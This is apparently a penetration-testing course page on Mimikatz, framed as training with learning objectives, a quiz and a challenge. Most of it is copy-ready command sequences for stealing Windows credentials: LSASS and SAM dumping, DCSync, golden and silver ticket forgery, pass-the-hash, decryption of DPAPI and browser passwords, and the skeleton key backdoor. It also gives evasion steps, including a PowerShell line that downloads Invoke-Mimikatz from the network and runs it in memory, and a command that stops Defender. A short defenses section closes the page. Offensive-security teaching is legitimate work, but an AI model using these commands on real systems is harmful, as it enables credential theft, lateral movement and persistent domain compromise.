Mimikatz Deep Dive

intermediate45 minWriteup

Mastering the swiss army knife of Windows credentials

Learning Objectives

  • Use Mimikatz modules
  • Dump credentials from memory
  • Perform pass-the-hash/ticket
  • Extract secrets from LSASS

Mimikatz is the Swiss Army knife of Windows credential attacks. Created by Benjamin Delpy (@gentilkiwi), it's the tool that made

,
Related

Golden Tickets

, and countless other attacks accessible to everyone. If you do Windows pentesting, you WILL use Mimikatz.

Think of Mimikatz as a master lockpick for Windows security. It exploits how Windows stores and handles credentials in memory - extracting passwords, hashes, tickets, and keys that Windows thought were safely protected.

Heavily Detected

Mimikatz is one of the most signatured tools in existence. Every AV, EDR, and security product looks for it. Direct execution rarely works on protected systems - but the techniques still do.

Running Mimikatz

1606070;"># Basic execution
2mimikatz.exe
3 
4606070;"># Run command directly
5mimikatz.exe 606070;">#a5d6ff;">"privilege::debug" "sekurlsa::logonpasswords" exit
6 
7606070;"># Elevated privileges required for most functions
8privilege::debug   606070;"># Enable debug privilege
9 
10606070;"># Log output to file
11log output.txt
12sekurlsa::logonpasswords
13log           606070;"># Stop logging
14 
15606070;"># Common Issues:
16606070;"># "ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory"
17606070;"># = Need to run as admin/SYSTEM
18606070;"># = Credential Guard may be enabled

Evasion Techniques

1606070;"># Invoke-Mimikatz (PowerShell, in-memory)
2IEX (New-Object Net.WebClient).DownloadString(606070;">#a5d6ff;">'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
3Invoke-Mimikatz -Command 606070;">#a5d6ff;">'"sekurlsa::logonpasswords"'
4 
5606070;"># pypykatz (Python implementation)
6pypykatz lsa minidump lsass.dmp
7 
8606070;"># From LSASS dump (avoid running on target)
9sekurlsa::minidump lsass.dmp
10sekurlsa::logonpasswords
11 
12606070;"># Safe Mode boot (bypasses many protections)
13606070;"># ProcDump + offline analysis

sekurlsa Module - Credential Extraction

1606070;"># Most important module - extracts credentials from LSASS
2 
3606070;"># All credentials (passwords, hashes, tickets)
4sekurlsa::logonpasswords
5 
6606070;"># Output includes:
7Authentication Id : 0 ; 12345
8Session           : Interactive from 1
9User Name         : Administrator
10Domain            : CORP
11Logon Server      : DC01
12Logon Time        : 12/1/2024 9:00:00 AM
13SID               : S-1-5-21-...-500
14        msv :
15         [00000003] Primary
16         * Username : Administrator
17         * Domain   : CORP
18         * NTLM     : a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx
19         * SHA1     : abc123...
20        tspkg :
21         * Username : Administrator
22         * Domain   : CORP
23         * Password : SuperSecret123!    <-- Plaintext on older systems!
24        wdigest :
25         * Username : Administrator
26         * Domain   : CORP
27         * Password : (null)             <-- Disabled by default since 2012R2
28        kerberos :
29         * Username : Administrator
30         * Domain   : CORP.LOCAL
31         * Password : (null)             <-- Or plaintext if cached

Specific Extraction Commands

1606070;"># Just NTLM hashes
2sekurlsa::msv
3 
4606070;"># Kerberos tickets
5sekurlsa::tickets
6sekurlsa::tickets /export  606070;"># Save .kirbi files
7 
8606070;"># WDigest passwords (if enabled)
9sekurlsa::wdigest
10 
11606070;"># SSP credentials
12sekurlsa::ssp
13 
14606070;"># LiveSSP
15sekurlsa::livessp
16 
17606070;"># TsPkg (Terminal Services)
18sekurlsa::tspkg
19 
20606070;"># Kerberos encryption keys
21sekurlsa::ekeys
22 
23606070;"># Process specific credentials
24sekurlsa::process /pid:1234

WDigest Password Trick

WDigest stores plaintext passwords in memory but is disabled by default since 2012R2. On older systems or if UseLogonCredential=1, you get plaintext passwords!

lsadump Module - Local Credentials

1606070;"># SAM database (local accounts)
2lsadump::sam
3 
4606070;"># Output:
5RID  : 000001f4 (500)
6User : Administrator
7  Hash NTLM: a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx
8 
9606070;"># From offline SAM/SYSTEM files
10lsadump::sam /sam:SAM /system:SYSTEM
11 
12606070;"># LSA secrets (service account passwords, auto-logon, etc.)
13lsadump::secrets
14 
15606070;"># Output may include:
16606070;"># DefaultPassword (auto-logon)
17606070;"># _SC_ServiceName (service account passwords)
18606070;"># NL$KM (DPAPI master key)
19 
20606070;"># Domain cached credentials (DCC2)
21lsadump::cache
22606070;"># Format: $DCC2$10240#user#hash
23606070;"># Crack with hashcat -m 2100

DCSync Attack

1606070;"># Replicate credentials from DC (requires DCSync rights)
2lsadump::dcsync /user:Administrator
3lsadump::dcsync /user:krbtgt       606070;"># For Golden Tickets!
4lsadump::dcsync /all /csv          606070;"># All users, CSV format
5 
6606070;"># From DC (with DA access)
7lsadump::lsa /inject                606070;"># Inject to get KRBTGT
8lsadump::lsa /patch                 606070;"># Patch LSASS for access

kerberos Module - Ticket Attacks

1606070;"># List cached tickets
2kerberos::list
3 
4606070;"># Purge all tickets (clear cache)
5kerberos::purge
6 
7606070;"># Pass-the-Ticket (inject ticket)
8kerberos::ptt ticket.kirbi
9kerberos::ptt C:\tickets\*.kirbi   606070;"># All tickets in folder
10 
11606070;"># Golden Ticket creation
12kerberos::golden /user:Administrator /domain:corp.local \
13  /sid:S-1-5-21-... /krbtgt:HASH /ptt
14 
15606070;"># Silver Ticket creation
16kerberos::golden /user:Administrator /domain:corp.local \
17  /sid:S-1-5-21-... /target:dc.corp.local /service:cifs \
18  /rc4:SERVICE_HASH /ptt

Pass-the-Hash with Mimikatz

1606070;"># Spawn process with different credentials
2sekurlsa::pth /user:Administrator /domain:corp.local \
3  /ntlm:a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx /run:cmd.exe
4 
5606070;"># Opens new cmd.exe with Administrator's credentials
6606070;"># For NTLM authentication (not interactive logon)
7 
8606070;"># Options:
9/user:     - Username
10/domain:   - Domain (or . for local)
11/ntlm:     - NTLM hash
12/aes256:   - AES256 key (stealthier)
13/run:      - Program to execute (default: cmd.exe)
14 
15606070;"># Common uses
16sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH /run:606070;">#a5d6ff;">"mstsc.exe /v:target"
17sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH /run:powershell.exe

dpapi Module - DPAPI Secrets

1606070;"># DPAPI (Data Protection API) protects:
2606070;"># - Chrome/Edge saved passwords
3606070;"># - Credential Manager entries
4606070;"># - RDP saved credentials
5606070;"># - Various application secrets
6 
7606070;"># Decrypt master keys
8dpapi::masterkey /in:masterkey /sid:S-1-5-21-...-1001 /password:UserPassword
9 
10606070;"># Or with domain backup key (DA required)
11dpapi::masterkey /in:masterkey /rpc
12 
13606070;"># Decrypt Chrome passwords
14dpapi::chrome /in:606070;">#a5d6ff;">"Login Data" /unprotect
15 
16606070;"># Decrypt Credential Manager
17dpapi::cred /in:credential_blob /masterkey:KEY
18 
19606070;"># Extract domain backup key (for all DPAPI secrets)
20lsadump::backupkeys /export

vault & crypto Modules

1606070;"># Vault - Windows Credential Manager
2vault::list        606070;"># List vaults
3vault::cred        606070;"># Extract credentials
4 
5606070;"># Crypto - Certificates and keys
6crypto::capi        606070;"># List CAPI keys
7crypto::cng         606070;"># List CNG keys
8crypto::certificates /export    606070;"># Export certificates
9 
10606070;"># Export private keys (requires patch)
11crypto::capi
12privilege::debug
13crypto::cng
14crypto::certificates /export /systemstore:LOCAL_MACHINE

Other Useful Modules

1606070;"># token - Token manipulation
2token::list                    606070;"># List tokens
3token::elevate                 606070;"># Elevate to SYSTEM
4token::elevate /domainadmin    606070;"># Find and elevate to DA token
5token::revert                  606070;"># Revert to original token
6 
7606070;"># process - Process manipulation
8process::list                  606070;"># List processes
9process::suspend /pid:1234     606070;"># Suspend process
10 
11606070;"># service - Service manipulation
12service::list                  606070;"># List services
13service::stop /name:Defender   606070;"># Stop service
14service::remove /name:malware  606070;"># Remove service
15 
16606070;"># net - Network information
17net::user                      606070;"># Domain users
18net::group                     606070;"># Domain groups
19net::localgroup                606070;"># Local groups
20 
21606070;"># misc - Miscellaneous
22misc::memssp                   606070;"># Inject SSP for password logging
23misc::skeleton                 606070;"># Skeleton Key attack

Skeleton Key Attack

1606070;"># Injects master password into LSASS on DC
2606070;"># Any user can authenticate with "mimikatz" as password
3606070;"># Original passwords still work
4 
5privilege::debug
6misc::skeleton
7 
8606070;"># Now you can:
9606070;"># - Login as anyone with password "mimikatz"
10606070;"># - Original passwords still work
11606070;"># - Persists until DC reboot
12 
13606070;"># Detection:
14606070;"># - LSASS anomalies
15606070;"># - Event ID 4673 (sensitive privilege use)
16606070;"># - Memory forensics
17 
18606070;"># Limitations:
19606070;"># - Requires DA access
20606070;"># - Only affects that DC (do all DCs for full coverage)
21606070;"># - Gone after reboot

Aggressive Technique

Skeleton Key modifies LSASS memory on the DC. It's detectable and could cause stability issues. Use only when persistence is critical and you understand the risks.

Defenses Against Mimikatz

1Modern Protections:
2├── Credential Guard
3│   └── Virtualizes LSASS - Mimikatz can't access
4│   └── Check: Get-ComputerInfo | Select DeviceGuardSecurityServicesRunning
5├── LSA Protection (RunAsPPL)
6│   └── LSASS runs as Protected Process
7│   └── Check: reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
8├── Disable WDigest
9│   └── No plaintext passwords in memory
10│   └── Check: UseLogonCredential should be 0 or missing
11├── Protected Users Group
12│   └── No NTLM, no delegation, shorter ticket lifetime
13└── Windows Defender Credential Guard
14 
15Bypasses exist but require:
16- Kernel drivers
17- Exploiting vulnerable drivers
18- Offline attacks (dump LSASS, analyze elsewhere)

Mimikatz Methodology

Credential Extraction Flow

1
ElevateRun as admin, privilege::debug
2
Extractsekurlsa::logonpasswords for everything
3
SaveExport tickets, hashes for later use
4
LateralPass-the-Hash/Ticket to new targets
5
EscalateDCSync if possible, or find DA session
6
PersistGolden Ticket for long-term access

Knowledge Check

Quick Quiz
Question 1 of 3

What privilege must be enabled before most Mimikatz operations?

Challenges

Full Credential Harvest

Challenge
🔥 intermediate

On a compromised Windows machine with admin access, extract: NTLM hashes, Kerberos tickets, and any cached domain credentials.

Need a hint? (4 available)

Key Takeaways

  • Mimikatz extracts credentials from Windows memory
  • sekurlsa::logonpasswords is the primary extraction command
  • lsadump handles SAM, secrets, cache, and DCSync
  • kerberos module creates Golden/Silver tickets
  • Credential Guard virtualizes and protects LSASS
  • Heavily signatured - use alternatives or evasion